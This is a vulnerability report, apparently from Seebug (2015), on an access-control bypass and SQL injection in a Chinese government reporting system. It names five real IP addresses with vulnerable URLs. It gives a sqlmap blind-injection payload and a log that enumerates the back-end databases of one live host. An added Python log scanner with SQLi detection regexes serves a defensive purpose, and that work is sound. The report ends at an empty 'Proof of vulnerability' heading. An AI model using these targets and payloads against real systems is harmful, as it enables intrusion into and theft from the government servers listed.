Broken access control and SQL injection in a government system

2015-01-06T00:00:00
ID SSV:94979
Type seebug
Reporter Root
Modified 2015-01-06T00:00:00

Description

Brief description:

As titled.

Details:

Vendor: Shandong Nongyou Software, official site: http://www.nongyou.com.cn/

Instances of the access-control bypass (left.aspx):
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx

<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

2. An SQL injection reachable through the same access-control bypass (the pid parameter of StatisticalAnalysisChart.aspx):
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=

Tested injection point: http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz

[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\123.134.189.60'
```

All of the above instances are reproducible.
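As a defender-side addition (not part of the original report), the following Python scans IIS W3C log lines for the boolean-based blind probing pattern visible in the sqlmap payload above (a quote break-out followed by `AND <n>=<n>` on the `pid` parameter of StatisticalAnalysisChart.aspx) and counts suspicious requests per client address. The log lines, field order and addresses are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines for this example (fields: date time s-ip
# cs-method cs-uri-stem cs-uri-query c-ip sc-status). Addresses are made up.
SAMPLE_LOG = """\
2015-01-05 18:13:10 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid=12 192.0.2.10 200
2015-01-05 18:13:11 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid=12'+AND+5349=5349+AND+'QMWz'='QMWz 192.0.2.77 200
2015-01-05 18:13:11 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid=12'+AND+5349=5350+AND+'QMWz'='QMWz 192.0.2.77 302
2015-01-05 18:13:12 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid=12%27%20AND%201%3D1-- 192.0.2.77 200
2015-01-05 18:13:13 10.0.0.5 GET /jubao/left.aspx - 192.0.2.10 200
"""

# Boolean-based blind probing compares two literals ("AND 5349=5349", "AND 1=2")
# so that the true and false variants render differently; a legitimate numeric
# id never carries such a clause, nor a quote followed by a SQL keyword.
BOOLEAN_PROBE = re.compile(r"\b(?:and|or)\s+'?\s*(\d+)\s*=\s*'?\s*(\d+)", re.I)
QUOTE_BREAKOUT = re.compile(r"'\s*(?:and|or|--|;)", re.I)

def parse_w3c_line(line):
    """Pick the fields the scanner needs out of one W3C log line."""
    parts = line.split()
    if len(parts) < 8:
        return None
    return {"stem": parts[4], "query": parts[5], "client": parts[6], "status": parts[7]}

def is_blind_probe(raw_value):
    """True when a URL-encoded parameter value looks like blind SQLi probing."""
    decoded = unquote_plus(raw_value)  # decode once; the regexes need the literal quote
    return bool(BOOLEAN_PROBE.search(decoded) or QUOTE_BREAKOUT.search(decoded))

def scan(log_text, stem="/jubao/StatisticalAnalysisChart.aspx", param="pid"):
    """Count, per client address, requests whose `param` on `stem` looks injected."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None or rec["stem"] != stem or rec["query"] == "-":
            continue
        for pair in rec["query"].split("&"):
            key, _, raw = pair.partition("=")
            if key == param and is_blind_probe(raw):
                hits[rec["client"]] += 1
    return dict(hits)

if __name__ == "__main__":
    for client, count in scan(SAMPLE_LOG).items():
        print(f"{client}: {count} suspicious pid values")  # 192.0.2.77: 3 suspicious pid values
```

Pointing `scan` at real IIS logs (with the field order adjusted to the site's `#Fields:` header) surfaces the probing burst that precedes a sqlmap dump like the one above, and the same regexes can serve as a request-filter rule while the concatenated query is replaced with a parameterized one.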

Proof of vulnerability:
